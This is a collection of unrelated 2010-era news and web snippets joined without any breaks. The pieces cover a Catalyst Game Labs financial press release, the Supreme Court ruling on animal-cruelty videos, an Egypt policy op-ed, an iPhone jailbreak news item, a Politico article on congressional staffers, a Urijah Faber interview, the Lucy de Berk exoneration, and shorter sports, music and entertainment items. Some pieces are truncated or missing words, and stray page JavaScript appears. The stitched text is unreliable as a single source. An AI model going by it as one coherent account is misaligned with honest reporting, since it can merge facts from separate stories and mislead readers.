StumbleUpon
What are these ?
E-mail this to a friend Printable version
For Immediate Release
Catalyst Game Labs recently completed a detailed financial review of the company .
We learned that over the past several years the company has achieved dramatic growth in terms of demand , increased total revenues and strong sales with an increasing market share in the gaming industry , despite a lackluster economy .
We are thrilled by that news and are eager to move forward with our upcoming original game Leviathans , along with our other new casual games .
We also remain committed to plans for our beloved licensed games : Shadowrun , BattleTech , Eclipse Phase , and CthuluTech .
While we wish the review had only uncovered positive news , we also discovered our accounting procedures had not been updated as the company continued to grow .
The result was that business funds had been co-mingled with the personal funds of one of the owners .
We believe the missing funds were the result of bad habits that began alongside the creation of the company , which was initially a small hobby group .
Upon further investigation , in which the owner has willingly participated , the owner in question now owes the company a significant balance and is working to help rectify the situation .
The current group of owners was presented with this information on Monday .
Administrative organization for the company is under review , and accounting procedures have been restructured , to correct the situation and provide more stringent oversight .
We feel the management team at Catalyst did the responsible thing by seeking this financial review and we will continue to restructure as needed .
We are in discussions with our partners and freelancers to remedy any back payments that may also be due as a result of this review .
We are embarrassed that this situation did occur but we hope our eagerness to make these changes , along with our reputation for making great games , will encourage you to stand by us .
We understand that for a few employees the news was too stressful and we wish them all the best in their new endeavors .
However , the majority of the team remains and will continue to bring great entertainment to you all .
We appreciate the support our friends , freelancers , and fans have provided us in the past and look forward to a successful future .
The Northern Hemisphere once more begins its tilt towards the Sun , awakening flowers , ushering in new life , and coaxing people outdoors once again .
The changing of the season is easily observed in gardens , parks , zoos , farms , festivals and more .
Collected here are a handful of photographs showing signs of Spring , 2010 , as the final remnants of last winter start to melt away .
( 27 photos total
Washington ( CNN ) --
The Supreme Court has struck down a federal law designed to stop the sale and marketing of videos showing dogfights and other acts of animal cruelty , saying it is an unconstitutional violation of free speech .
The 8 - 1 decision was a defeat for animal rights groups and congressional sponsors of the unusual legislation .
The specific case before the court dealt with tapes showing pit bulldogs attacking other animals and one another in staged confrontations .
The justices Tuesday concluded the scope and intent of the decade - old statute was overly broad .
" The First Amendment itself reflects a judgment by the American people that the benefits of its restrictions on the government outweigh its costs , " said Chief Justice John Roberts .
He concluded Congress had not sufficiently shown " depictions " of dogfighting were enough to justify a special category of exclusion from free speech protection .
The high court threw out the conviction of Robert Stevens , a Pittsville , Virginia , man who sold videos through his business , Dogs of Velvet and Steel .
According to court records , undercover federal agents found he was advertising his tapes in Sporting Dog Journal , an underground magazine on illegal dogfighting .
" This is what I was hoping for , " Stevens told CNN just after the ruling was announced .
" I am not nor have I ever been a dog fighter or a promoter of dogfighting .
I am a journalist and an author . "
Among the products Stevens advertised was " Catch Dogs , " featuring pit bulls chasing wild boars on organized hunts and a " gruesome depiction of a pit bull attacking the lower jaw of a domestic farm pig , " according to the Philadelphia , Pennsylvania - based appeals court that ruled on the case earlier .
Stevens was charged in 2004 with violating interstate commerce laws by selling depictions of animal cruelty .
He was later sentenced to 37 months in prison , and promptly appealed .
That sentence was put on hold pending resolution of this appeal .
He argued his sentence was longer than the 14 months given professional football player Michael Vick , who ran an illegal dogfighting ring .
It was the first prosecution in the United States to proceed to trial under the 1999 law .
The video marketer is not related to Justice John Paul Stevens , who turned 90 Tuesday .
The court made no mention of the milestone as it held a two - hour public session .
Nearly every state and local jurisdiction have their own laws banning mistreatment of wild and domesticated animals , and usually handle prosecutions of animal cruelty .
Several media organizations had supported Stevens , worrying the federal law could implicate reports about deer hunting , and depictions of bullfighting in Ernest Hemingway novels .
Roberts agreed , saying , " We read [ the federal law ] to create a criminal prohibition of alarming breadth . "
" Jurisdictions permit and encourage hunting , and there is an enormous national market for hunting - related depictions in which a living animal is intentionally killed , " said Roberts .
" An otherwise - lawful image of any of these practices , if sold or possessed for commercial gain within a state that happens to forbid the practice , falls within the prohibition of [ the federal law ] . "
During oral arguments in October , the justices offered a number of wide - ranging hypotheticals over what the law could forbid , including : fox hunts , pate de foie gras from geese , cockfighting , bullfighting , shooting deer out of season , even Roman gladiator battles .
Only Justice Samuel Alito dissented in the case , and he focused on one of the most disturbing aspects raised in the appeal , the marketing of so - called " crush " videos , in which women -- with their faces unseen -- are shown stomping helpless animals such as rabbits to death with spiked - heel shoes or with their bare feet .
" The animals used in crush videos are living creatures that experience excruciating pain .
Our society has long banned such cruelty , " he said .
The courts , he said , have " erred in second - guessing the legislative judgment about the importance of preventing cruelty to animals . "
He predicted mores crush videos will soon flood the underground market , because the ruling has " the practical effect of legalizing the sale of such videos . "
Roberts suggested a law specifically banning crush videos might be valid , since it would be narrowly tailored to a specific type of commercial enterprise .
Alito noted that would not help dogs forced to fight each other , where , he said , " the suffering lasts for years rather than minutes . "
The government had argued a " compelling interest " in stopping people who would profit from dog attack tapes and similar depictions .
Roberts dismissed suggestions by the Justice Department that only the most extreme acts of cruelty would be targeted .
" The First Amendment protects against the government , " Roberts said .
" We would not uphold an unconstitutional statute merely because the government promised to use it responsibly . "
The Humane Society , other animal rights groups and 26 states backed the government .
If the law had been upheld , it would have been only the second time the Supreme Court had identified a form of speech undeserving of protection by the First Amendment .
The justices in 1982 banned the distribution of child pornography .
This is the second time this year the high court has tossed out federal legislation on free speech grounds .
The justices in January nullified parts of a sweeping campaign finance reform law , giving corporations , unions , and advocacy groups more power to bankroll federal elections .
Find Your Love is the second single to be released from Drake ’s debut album Thank Me Later , and it will be released in musical outlets today apparently .
A music video has already been shot so expect to be seeing that anytime soon .
p.s. production comes from Kanye West who gives the track that 808 ’s & Heartbreak feel
Drake – Find Your Love
Audio clip : Adobe Flash Player ( version 9 or above ) is required to play this audio clip .
Download the latest version here .
You also need to have JavaScript enabled in your browser .
Davos , Switzerland to Tirano , Italy
At around 20 mph , the Bernina Express must be one of the slowest trains to earn that description .
You would n’t want it to go any faster though , since it rears and plunges over the southern Alps , navigating 196 bridges , some of them spanning dizzying chasms , and boring through mountains via 55 ­tunnels .
The views from the glass - roofed panorama car as it climbs 2,253 m over the Albula pass to St Moritz are staggering .
And the engineering skills that zigzagged the track over precipitate terrain are so impressive that it has ­become a Unesco World Heritage Site .
Journey time : four hours , from £ 35 one way plus reservation fee , rhb.ch
Avoiding the Mubarak pyramid scheme
The policy debate over whether to press autocratic yet " friendly " regimes on democracy and human rights is often cast as " values versus interests " or " realism versus idealism , " but in the case of Egypt it is better framed as the trade - off between short - term and longer - term interests ( or even medium - term , considering President Hosni Mubarak ’s age of 81 and his regime ’s brittleness ) .
For a dwindling time longer , Mubarak might continue to offer a degree of stability and be a sometimes reliable partner on regional peace and security issues .
But his remaining time in office is finite , and there are positive ferments for reform brewing in Egypt that are in the strategic interest of the United States to support .
In a sign of the times , even Mohammed El - Baradei , frequently nettlesome in his former role as head of the IAEA , has emerged in the unlikely reincarnation as one of Mubarak ’s most energetic electoral challengers .
Jackson
Diehl points out as much in his excellent column urging the Obama administration to seize the democracy agenda in Egypt as a strategic opportunity in a troubled region .
And he is right .
But the Obama administration seems to see this as more of an annoyance than an opportunity , at least judging by its damaging cuts imposed over the past year on U.S. democracy funding in Egypt .
Besides whacking the budget from $ 45 million to $ 20 million , perhaps even more damaging was the Administration ’s imposition of new regulations prohibiting any USAID funding going to groups not approved by the Egyptian Government — which happen to be precisely the same groups that are the most potent reformers and that most need the funding .
While the concern is sometimes raised that visible US funding for reformers risks " tainting " them , the fact remains that the democracy funding was only given to Egyptians who applied for it aware of and willing to assume any risks .
And several groups and individuals — such as Safwat Girgis , Ahmed Samih , Radio Horytna , and the Egyptian Center for Human Rights — have been willing to appeal publicly for U.S. funding and support in the wake of the budget cuts .
Even more important than the funding itself can be the display of American moral support for democracy activists , which can increase their sphere of protection and alert autocratic regimes of the heightened diplomatic cost to any repression .
This is linked to economic reform as well .
The Egyptian state monopolizes not only political life but also too much of the economy , and even though its economic growth rates have accelerated in recent years they have not kept pace with a burgeoning population .
The Mubarak regime ’s autocratic constraints on political and economic liberty have atrophied what could otherwise be a vibrant middle class and civil society .
Instead , Egypt remains mired in a negative cycle in which lack of economic opportunity leaves large numbers of un - or under - employed citizens ( especially young men ) , who in turn have few outlets for constructive political expression — hence in part the persistent appeal of the Muslim Brotherhood .
Despite a rich intellectual and cultural history , abundant natural resources , and strategic location , Egypt continues to chronically under - perform in most political and economic development metrics .
For example , in the Legatum Prosperity Index , Egypt ranks in the global bottom third on economic fundamentals , and among the world ’s lowest on democratic institutions , governance , personal freedom , and even social capital — the last factor indicating that Egyptian citizens distrust not only their government but also each other .
What to do ?
The Obama administration should at a minimum pursue a three - part strategy .
First , restore — better yet , increase — funding for beleaguered democracy and human rights activists , and do not let the Egyptian government decide who receives the grants .
Second , as Jay Hallen argues here , transform economic development programs so that funding helps support urban Egyptian entrepreneurs and access to capital for growing small and medium size enterprises .
Third , senior U.S. officials — especially President Obama and Secretary Clinton — should consistently and publicly support the principles of religious freedom , freedom of expression , freedom of assembly , and open electoral competition in Egypt .
Implementing these points by no means precludes also working constructively with Mubarak , who still is Egypt ’s leader and can sometimes be a helpful ally .
But the current " Mubarak - only " policy is short - sighted and ineffective .
Moreover , it is a policy of Mubarak ’s own devising — as he has squelched liberal political dissenters and presented himself as the essential strongman who is the only alternative to Islamic extremists — and not a policy in the American interest .
When you are experiencing unpleasant symptoms as a result of a serious injury or accident , call Bendall & Mednick today at
518-370-2211 or toll - free at 888-324-7261 .
We have three conveniently located offices in the Capital District of New York as well as a satellite office in Atlanta , GA .
I might 've said that it was time for another parental freakout over content in comic books had we not just seen a mom in Minnesota making a fuss over imaginary sexual situations in " Bone , " so I 'm a little bit surprised to see another incident cropping up so quickly .
But not a lot .
Basically , a mom in Utah bought a repackaged set of two superhero comics at a dollar store for her 10 - year - old , which included a copy of " Spectre " # 9 , which was originally published in 1987 .
Just something to keep in mind -- this controversy is over a comic that is 23 years old , which is n't particularly " news , " even for a local news station .
tweetmeme_url =
' http://comicsalliance.com/2010/04/20/boy-finds-boobs-in-spectre-issue-from-1987-utah-parents-call/';
tweetmeme_source = ' ComicsAlliance ' ; digg_url =
' http://digg.com/comics_animation/Boy_Finds_Boobs_in_Comic_from_1987_Parents_Call_the_News';
Anyway , the comic included a scene with a naked lady , although she 's not really " naked " so much as she " has blue smoke conveniently draped around her nipples . "
In fairness to the parents , the copy on the repackaging did say that " all comic books inserted in the ' Superhero Comic Book Spectacular ' are family friendly and will bring hours of enjoyable reading , " and while the later might be true , the former was not .
Also , the comics were put in the child 's Easter basket , which is unfortunate ( but kind of hilarious ) .
But it appears that rather than speaking to the manager of the store , the family 's first call was to a local news station , and when informed about the situation , the store manager was shocked and immediately pulled all the two - comic sets from the shelves -- probably something that could have been dealt with without involving a news crew .
The money quote comes from the poor kid , who ends up on camera talking about how much naked ladies make him angry , a fact that will unfortunately now be linked with his name on Google forevermore :
" I seen the naked lady and I got mad . "
Ten year old Sheldyn Conley loves comic books but knew something was wrong when he opened " The Spectre . "
He says , " I just turned the page and I seen the naked ladies so I handed it to a grownup and said , ' Look at this . ' "
Check out the news video moral panic after the jump .[ via Newsarama , io9 ]
DayPortPlayer.newPlayer({articleID:" 97306 " , domain :" ktvx.web.entriq.net " , playerInstanceID :" 27574A89-06D1-CD92-4444-22719C5099EC " ,accSite :" KTVX " , accPos :" CCTVI.VIDEO.LOCAL " , autoPlay : " false " , playVideoAds : " true " , videoAdConDefID :" 6 " , videoAdObjectID :" 14 " , bannerAdConDefID :" 15 " } ) ;
Less than 24 hours after Apple had revealed its preview of iPhone OS 4.0 and made it available to developers , hackers revealed they had successfully manage to run an unauthorized VNC client on the mobile operating system .
A hacker from the iPhone Dev Team who goes by the handle MuscleNerd uploaded on Friday a video of an iPhone 3GS running the iPhone OS 4 beta , as well as Veency , which is virtual network computing software available as an unauthorized application for the iPhone .
To run software like Veency , an iPhone must be " jailbroken , " which is the name given to a process that allows users to run unauthorized code on Apple 's handset .
He noted via his Twitter account that Apple 's pre-release betas are " very " buggy , and cautioned users not to test it on their own iPhone .
The hacker also took issue with Apple 's claim made Thursday that hardware restrictions have prevented multitasking from being enabled on older iPhone hardware .
In addition to existing unauthorized jailbreak solutions for multitasking , the hacking community has also released software to enable MMS functionality on the first - generation iPhone .
The latest development is by no means confirmation that any jailbreaking methods will work with iPhone OS 4.0 when it ships .
It 's likely that Apple will make changes to thwart those exploits before the software update is made available this summer .
It 's also expected that Apple will build in new hardware security features in its next - generation iPhone , due to be announced this summer .
Late last year , Apple became more aggressive against jailbreak attempts when it quietly updated the BootROM in the iPhone 3GS to thwart potential hackers .
It marked the first time ever that the handset maker had modified its hardware in the middle of a product line , without a new model released .
Earlier this week , MuscleNerd demoed a new jailbreak method that was said to work with Apple 's iPad , iPhone 3GS and third - generation iPod touch .
The software has not yet been released publicly , but could allow users of the latest hardware revision of the iPhone 3GS to unlock their handset for use on alternative carriers .
There is no need to unlock the iPad , which does not ship with a carrier lock .
The warranty - voiding jailbreak process can also allow users to run software Apple does not allow .
Hackers have created their own custom applications that Apple might not allow in the App Store .
Jailbreaking can also be used to pirate App Store software , one major reason why Apple has fought the practice .
,
this is one of the most annoying apps on the N900 .
I launched it and it took pretty much forever to get a GPS lock .
forever meaning i found the place myself than being able to use the app .
Nokia N95 being a symbian phone and there were so many symbian phones in the world google was forced to develop apps for it but the n900 running linux is so few and far in the world , google isnt really bothered .
it rather use its mobile resource to develop android than waste time with maemo. after having the n900 for a few months i'm very disappointed .
its powerful allright but whats the point when you dont even have the basic apps thats the N95 has .
House Minority Leader John Boehner dismissed Democratic aides writing the financial regulatory reform bill as ' little punk staffers . '
' Little punk staffers ' fuming at GOP
First , former House Speaker Newt Gingrich ( R - Ga. ) said Capitol Hill staffers have no “ contact with reality ” and spend “ their entire life being arrogant to visitors from back home . ”
Then , House Minority Leader John Boehner ( R - Ohio ) dismissed Democratic staffers writing the financial regulatory reform bill as “ little punk staffers . ”
Advertisement
Then , Rep. Devin Nunes ( R - Calif. ) accused House Democrats of employing “ staff thugs ” to watch over lawmakers during key House votes .
And then , the National Republican Congressional Committee produced T - shirts mocking Democratic aides who will lose their jobs in November if their bosses lose theirs .
Hill staffers often feel overworked and underappreciated .
Now , they ’re feeling abused — and they say that a handful of outspoken Republicans are to blame .
“ Most members of Congress appreciate the hard work that the staff does , which enables members to do their jobs , ” said Brendan Daly , spokesman for House Speaker Nancy Pelosi .
“ It ’s unfortunate that some of these Republican members are unnecessarily criticizing aides who are just doing their jobs . ”
And it ’s not just Democrats like Daly who are taking offense .
A House Republican staffer , who did n’t want to be identified taking issue with the words of the Republican leader , told POLITICO : “ Most staffers on the Hill are younger than you think they would be , making them an easy target for such remarks , but in reality they are also smarter than you think they would be .
As one who had to fight for my job here , I can say that getting a job as a ‘ little punk staffer ’ is a competitive process where only the very qualified succeed . ”
Although nearly 2,000
House staffers earn six - figure salaries , most Hill aides make relatively little , and many worked repeated 80 - hour weeks during the height of the health care debate — living on too little sleep and too many meals from office vending machines .
But the health care debate also offered a lot of Americans their first points of contact with Hill staffers .
And the ones who came away unhappy have n’t been shy about sharing their disappointment online .
Tony Shreeve , a Tennessee organizer for American Patriot Taxpayers , has been venting about what he says he saw on a Capitol balcony while rallying during last month ’s weekend debate on health care .
Staffers “ were outside , drinking wine , playing guitars and laughing .
It was totally disrespectful , ” said Shreeve .
“ They were up there celebrating while people below are obviously upset and trying to get their voices heard .
They were pretty much mocking us .
The arrogance up there was unbelievable .
The problem is not just politicians ; it ’s their workers , too .
I think the American people need to know what kind of people we have up there . ”
An anonymous blogger on Andrew Breitbart ’s BigGovernment.com wrote that a staffer in the office of Rep. John Garamendi ( D - Calif . ) hung up on him several times and that he was referred to the Capitol Police for “ harassing ” the staffer .
The left has its complaints , too .
An anti-war protest group that visited the Hyannis office of Rep. Bill Delahunt ( D - Mass . ) last month reported that it was shuttered and the staff was nowhere to be found , even though it was only 4 p.m. on a Friday .
A spokesman for Delahunt told POLITICO the claim was not true .
“ It has been observed that the staff of this congressional office has been gone from the premises as early as 3 p.m. on Fridays , ” one angry protester complained to the local newspaper .
“ I trust that appropriate measures have been taken to adjust the pay and salaries of those associated with the described premises . ”
Michael Robinson , a crisis management expert with Levick Strategic Communications , said anecdotes like these can have a damaging effect — and not just on the staffers but on their bosses as well .
“ This is going to splash back on their bosses and the whole institution , ” Robinson said .
“ Every opinion poll I ’ve read shows that Americans want Washington to be more serious and less partisan .
It ’s going in the opposite direction .
... Staffers need to grow up .
It ’s their job to do the work , not become the story . ”
But aides said that ’s part of the problem :
The publicity pecking order on Capitol Hill prevents them from speaking out in their own defense , at least on the record .
Privately , they say the attacks are unfair .
“ The recent Republican criticisms are more political than anything .
They ’re attacking legislative staff to push the idea of ‘ backroom deals ’ in the health care debate , ” said one Democratic staffer .
“ The reality is that staffers do as we ’re told , and so to criticize our work is unfair and unfortunate .
We do n’t make the decisions ; we help carry out the decisions our bosses make . ”
Most Republican staffers interviewed by POLITICO said they ’ve also been bothered by the name - calling , but they stopped short of calling out the Republican leaders behind it .
“ Name - calling is not needed , ” said one Senate legislative aide .
But “ I would assume that many of the members complaining have been here a while and perhaps have a point . ”
Some Democratic members have come to the defense of staffers .
House Financial Services Committee Chairman Barney Frank of Massachusetts has printed and distributed hundreds of snarky “ Little Punk Staffer ” pins to aides .
“ They are underpaid [ and ] overworked , and people are taking cheap shots at them , ” Frank told POLITICO .
“ You ’re seeing an arrogance and meanness and anger coming out that ’s part of this anti-government effort .
Then you see Republicans egging them on .
It ’s despicable behavior . ”
“ I deal with staffers all the time , and I do not think they are arrogant , ” said Sen. Arlen Specter ( D - Pa . ) .
“ I saw one up recently at 3 a .m. I do n’t know how they can work any harder . ”
Boehner himself has been known to have a soft spot for his staffers , and he was visibly devastated this winter by the sudden death of his longtime chief of staff , Paula Nowakowski .
Spokesman Michael Steel said Boehner was n’t talking about all staffers when he told a group of bankers not to let “ those little punk staffers take advantage of you . ”
“ Congressional staff should treat every American citizen with respect .
Clearly , Boehner was talking about any that don’t , ” Steel said .
In a different political environment , current staffers might get some kind words from former staffers who are now running for Congress .
But in an anti-incumbent , anti-Washington environment , the former staffers are n’t exactly racing to defend their own .
Jack Bailey , a former chief of staff who ’s running for the Republican nomination in the race against Rep. Lincoln Davis ( D - Tenn . ) , said he ’s been away from Washington “ long enough not to be part of the problem ” and is promising to “ bring a gun to a gunfight ” if elected .
Princella Smith , a former aide to Rep .
Anh “ Joseph ” Cao ( R - La . ) who ’s now running for Congress in Arkansas , likewise says she ’s been in Washington “ long enough to see how certain legislation got pushed through and long enough to see that I did n’t like it . ”
Still , she said the staffer - bashing is a “ bad - apple issue . ”
“ There are some staffers that get so caught up in the fact that they work on Capitol Hill and the power in their positions .
...
These isolated stories get a lot of media attention and perpetuate the image .
Stuff like that is giving staffers a bad name . ”
Two years ago , would it even be thinkable that Urijah Faber would not only not be the WEC Featherweight Champion , but that most experts would give him little to no chance to regain that title against the current champion ?
Doubtful .
Yet , that 's the very predicament " The California Kid " finds himself in today .
Without the belt , but with renewed purpose , the face of World Extreme Cagefighting and perhaps the entire featherweight division takes on his toughest test to date as he tangles with champion Jose Aldo , a man most consider to be the top of the featherweight division .
A lot rides on this fight .
For Faber , losing his second chance to regain the title after losing his belt and the rematch to Mike Brown could define his legacy .
And for the WEC , their first foray into pay - per- view could prove disastrous if the face of the franchise is soundly defeated by a Brazilian superfighter most MMA fans have never heard of .
But do n't tell that to Faber .
Sacramento's own is both clairvoyant and optimistic heading into this battle .
After an impressive submission win over Raphael Assuncao at WEC 46 , Faber believes he is poised to regain what was once his and reign over the 145 lbs division once again .
In fact , if you ask him , this is a match - up that suits his style .
As for predictions , we 'll worry about those later .
But there can be no doubt that what rides for Faber on Saturday are the greatest stakes of any fight in his career to date .
To listen to the entire thing , click below :
Transcribed highlights from our conversation after the break .
On evaluating GSP 's performance at UFC 111 :
Faber : I 's hard to say .
They give you all the reward when you 're the champion in this sport .
That 's just the way it is .
Having the ability to shut a guy who 's the number one contender down the way he did is pretty impressive .
I think he tried to finish it on a number of occasions , went for the submissions , and tried to pound the guy .
But at what point do you become a guy that is trying to please a fan and the other one to cement your reputation and spot in the record books as the most dominant champ ?
Thomas :
Let me ask you : is it always really an either / or situation ?
Is it either you can take the path he took and go for the submission or you stand - up and get knocked out ?
It seems to me , I mentioned this before .
If you look at the Mayhem Miller fight , a very similar ... same kind of offensive output in terms of submissions from St. Pierre , but St. Pierre beat him up for three rounds .
Seemed to me [ this time ] very little attempt from St. Pierre , who from all accounts has pretty good ground and pound .
Is n't there gray area where you can say St. Pierre did n't use all of the tools that he has ?
Faber :
You could say that , but it 's a lot more difficult when you 're actually in there fighting .
It 's not like he 's fighting someone he can throw around like a little kid even though it may look like that sometimes from the best fighters .
You know , these guys are dangerous guys .
They 're exactly the same size .
They have the exact same focus , exact same time to prepare .
So , Hardy 's a dangerous , dangerous opponent .
Could we have seen a more exciting fight ?
I 'm sure , but he got the job done , almost took his arm off in the process , so I , for one , throw caution to the wind and keep it exciting .
But that 's my style and it plays into me winning a lot of times , so it 's hard to be a critic on a guy who just had a dominating performance .
On the " fairness " of being ranked three in the world :
Faber : Sure , you guys can rank me wherever ... It does n't factor in to how I evaluate myself , no .
But it is irritating when you know you 're better than something .
I think the FIGHT !
Magazine rankings for a time there had me completely off the rankings altogether because they 're computer based and who knows what program they 're using or method or whatever it was .
As long as it's close to reality it does n't bother me in the least bit because it does n't really matter .
On evaluating Jose Aldo :
Faber :
It basically comes down to this .
When I really watch back to his fights his precision on his punches has n't been the key factor .
I think he's got precise kicks and knees that have really done the damage and he 's got fast hands .
He throws them fairly accurately , but the biggest thing for him is that he goes in for the kill .
He 's got dangerous stand - up .
He 's got strong jiu - jitsu .
His wrestling defense is pretty good , I think partially because of his athleticism .
I think as far as being well - rounded I 'm the better guy .
My wrestling caliber is better , I feel like my Brazilian jiu - jitsu game is better .
I 'd give [ Aldo ] a slight edge in the stand - up because he 's been finishing all of his guys with the stand - up , but I 've got heavy hands and I 've got all the tools to put him in danger when it comes to stand - up as well .
So , it 's basically being first and putting my will power onto him and making sure I 'm not caught by one of his heavy knees or kicks .
On Aldo vs Brown :
Faber : I was impressed .
I do n't want to say ‘ surprised ' necessarily .
Before I was thinking " Man , this could be the first time we see Jose Aldo tested " .
And it really was n't .
First round , you could 've possibly given the round to Brown .
It was not a decisive round either way .
But in the second round I think Brown just did not look like he was in the fight .
He talked about it afterward about he was n't mentally in that fight , he had his cut , things like that .
A lot of times you feel like people make excuses afterward , but I kinda got that sense when I watched that fight .
And as far as match - ups go , the difference in speed was very , very apparent .
It was just weird .
The way the fight finished was Aldo kinda bumped Mike Brown over and he turned over like the slowest I 've ever seen anyone turn over , and Aldo took his back and put the legs in and punched .
Did n't knock him out or anything , but was in a dominating position .
So , it 's hard to say when you look at the match - up , I mean it 's going to be nothing like when I fight him .
On evaluating his performance against Assuncao :
Faber : I think I did well .
One of the things I was really working on was being a little more precise in my punching because that was downfall against Brown the second time .
I hit [ Brown ] in the top of the head with a wild , heavy punch and busted my hand .
So , when I did land some punches [ against Assuncao ] they were on the button and some damage .
And then I was able to capitalize with a submission .
I 've got a history of submitting guys that were known for their jiu - jitsu game .
That 's because I 've got a really strong jiu - jitsu game .
I 've been training for six and a half years in Brazilian jiu - jitsu and before that twelve years of wrestling at the highest level as a Division I wrestler and in the NCAA Division I tournament .
So , I do n't think people give enough credit to my ground game .
You did n't get to see it against Mike Brown because I did n't have any hands to grapple , so you 're seeing a one - handed guy in there struggle , defending shots and getting back up .
I 've got a strong ground game .
I felt like I got to showcase that again [ against Assuncao ] .
On whether he sees himself as a stronger athlete than Aldo :
Faber :
It 's relative , you know ?
There 's strength , there 's speed , there 's explosivity .
I think we 're both different .
I 've shook his hand , put my hands on his body before .
The guy 's a solid dude , not weak by any means , we 're just built different .
I 'm sure there are parts of me that are stronger than him and maybe vice versa , but I feel like I 'm a good match - up .
On whether a loss to Aldo means the end for the WEC :
AMSTERDAM —A
Dutch nurse who served more than six years of a life sentence for allegedly murdering seven patients as a serial killer was exonerated Wednesday , and the country 's attorney general personally apologized for her ordeal .
The ruling ended a bizarre legal odyssey during which the country 's judicial system -- right up to the Supreme Court -- interpreted evidence wrongly , including statistics , autopsy results , and the nurse 's diaries .
" I 'll have to let it sink in a little while , " a beaming Lucy de Berk told reporters after the verdict clearing her of all charges was read .
The nurse is now a free woman and will receive a financial settlement from the government .
Looking back on the complex case , doubts were present from the time of the original verdict , but the case was n't reopened until a group of legal experts lobbied on the nurse 's behalf .
De Berk , now 49 , was released from prison in 2008 pending a retrial after an extraordinary review of her conviction -- which had been upheld by the country 's Supreme Court .
During last month 's retrial , prosecutors conceded the evidence they had used to build their original case was flawed and that they were not flexible enough after they became convinced of De Berk 's guilt early on in her case .
That led to Wednesday 's ruling , during which the Arnhem Appeals Court found that none of the deaths in which De Berk had once been implicated were even definitely unnatural .
Attorney General Harm Brouwers said he wanted to restore De Berk 's reputation .
" I 've offered my apologies for what happened to her , " Brouwers said , adding that the ministry was negotiating a financial settlement with her lawyers .
De Berk was arrested in 2001 after a 6 - month - old baby died while De Berk was on duty in a hospital in The Hague , in an incident initially thought to have been a poisoning .
After De Berk 's arrest , investigators uncovered what they saw as a trend of deaths and near - deaths in suspicious circumstances while she was alone with patients .
Prosecutors charged her with 13 killings and five attempted murders in Dutch hospitals between 1997 and 2001 .
All her alleged victims were very young and disabled or very old and ill .
She was convicted of three murders in 2003 , including the baby 's death , and sentenced to life in prison as a serial murderer .
Prosecutors at the time said De Berk may have seen herself as an angel of mercy , delivering death to patients who were suffering .
Wednesday 's ruling said a new analysis of the death of the baby that sparked the case was ambiguous at best .
That made it impossible to argue that the baby had been killed , " much less that the baby 's death was the result of intentional action " by De Berk .
Trial judges heard testimony by a statistician who put the odds at one in 342 million that it was mere coincidence she had been on duty when all the incidents deemed suspicious occurred .
That calculation was challenged and later proved bogus , but in 2004 appeal court judges upheld De Berk 's sentence and convicted her on four additional counts of murder and three of attempted murder .
Her sentence was unusually heavy by Dutch standards , in part because De Berk continued to deny wrongdoing and had shown no remorse .
During her initial trial , judges accepted as evidence entries in De Berk 's diaries in which she wrote about a " strange compulsion " and a secret she would take with her to her grave .
On Nov. 27 , 1999 , the day an elderly woman died in her care , she wrote that she had " given in " to her compulsion .
Wednesday 's ruling found there were no signs the elderly woman 's death was unnatural and there were many innocent explanations for the diary entries .
It formally dismissed all charges .
" With respect to the other deaths and life - threatening incidents , the court believes that investigations have uncovered no facts or circumstances that could give grounds for suspecting an unnatural cause , " the ruling said .
© Copyright 2010 Associated Press .
All rights reserved .
This material may not be published , broadcast , rewritten , or redistributed .
Hartford , Connecticut ( CNN ) --
A bill in Connecticut 's legislature that would remove the statute of limitations on child sexual abuse cases has sparked a fervent response from the state 's Roman Catholic bishops , who released a letter to parishioners Saturday imploring them to oppose the measure .
Under current Connecticut law , sexual abuse victims have 30 years past their 18th birthday to file a lawsuit .
The proposed change to the law would rescind that statute of limitations .
The proposed change to the law would put " all Church institutions , including your parish , at risk , " says the letter , which was signed by Connecticut 's three Roman Catholic bishops .
The letter is posted on the Web site of the Connecticut Catholic Public Affairs Conference , the public policy and advocacy office of Connecticut 's Catholic bishops .
It asks parishioners to contact their legislators in opposition of the bill .
The " legislation would undermine the mission of the Catholic Church in Connecticut , threatening our parishes , our schools , and our Catholic Charities , " the letter says .
The Catholic archdiocese of Hartford also published a pulpit announcement on its Web site , which was to be read during Mass on Sunday , urging parishioners to express opposition to the bill .
The bill has been revised to address some of the church 's concerns about frivolous abuse claims against it , according to Connecticut state Rep.
Beth Bye , one of the bill 's sponsors .
" The church did n't recognize that this bill makes improvements , " Bye said .
" The victims -- their lives have been changed and some will never recover from years of sexual abuse .
For me , it 's about giving them access to the courts . "
Under the bill 's provisions , anyone older than 48 who makes a sex abuse claim against the church would need to join an existing claim filed by someone 48 or younger .
Older claimants would need to show substantial proof that they were abused .
" They were worried about frivolous lawsuits and so we made the bar high , " Bye said .
The bill does not target the Catholic Church , she said .
The bishops ' letter raised concerns that the bill would allow claims that are 70 years or older , in which " key individuals are deceased , memories have been faded , and documents and other evidence have been lost . "
The letter said that the majority of cases would be driven by " trial lawyers hoping to profit from these cases . "
The bill passed in Connecticut 's House of Representatives , and Bye said the state Senate should vote on it in the next week or two .
It looks likemay be a go .
The sequel tohas been talked about since the original movie was a smash it last year and now MarketSaw ’s contacts at WETA say that not only is it happening , it ’s already in pre-production .
Word is that they plan to start shooting in October of this year .
There had been some question as to whether director Neill Blomkamp would make asequel his next project , unsurprisingly in the wake of the film ’s Oscar nomination he has a lot of options .
But MS says Neill is back in the director ’s chair along with Peter Jackson in a produce role again .
It ’s all rumor for now though , we ’ll let you know when there ’s some official confirmation .
As for what it ’ll be about if it actually happens , right now no one ’s entirely certain .
The last movie laid out several possible roadmaps which we discussed here .
For now , no one even really knows what it ’ll be called .
is just a convenient moniker until Blomkamp gives us something real .
Get Raps !
Get Raps !
Get Raps !
Get Raps !
" Every person have many unspeakable weakness . "
-ILL Mitch
The Securities and Exchange Commission on Friday charged Wall Street 's most gilded firm , Goldman Sachs , with defrauding investors in a sale of securities tied to subprime mortgages , Fortune reports .
The SEC said it charged New York - based Goldman and a vice president , Fabrice Tourre , for their failure to disclose conflicts in a 2007 sale of a so - called collateralized debt obligation .
Investors in the CDO ultimately lost $ 1 billion , the SEC said .
Read full Fortune story
The Oakland Raiders , after making a deal that shipped out their leading tackler for the past four years , added a possible starting quarterback Saturday in a deal with the Washington Redskins for Jason Campbell .
In acquiring Campbell , the Raiders added a year to his existing contract , the quarterback told ESPN.com 's Matt Mosley .
He will make $ 4.5 million in 2011 .
" I look at this as getting to start over , " Campbell told Mosley via phone .
" I talked to Mr. [ Al ] Davis , and he wanted me for two years .
He wants me to help their team to a new level . "
Campbell had already signed the Redskins ' tender offer worth $ 3.1 million for 2010 .
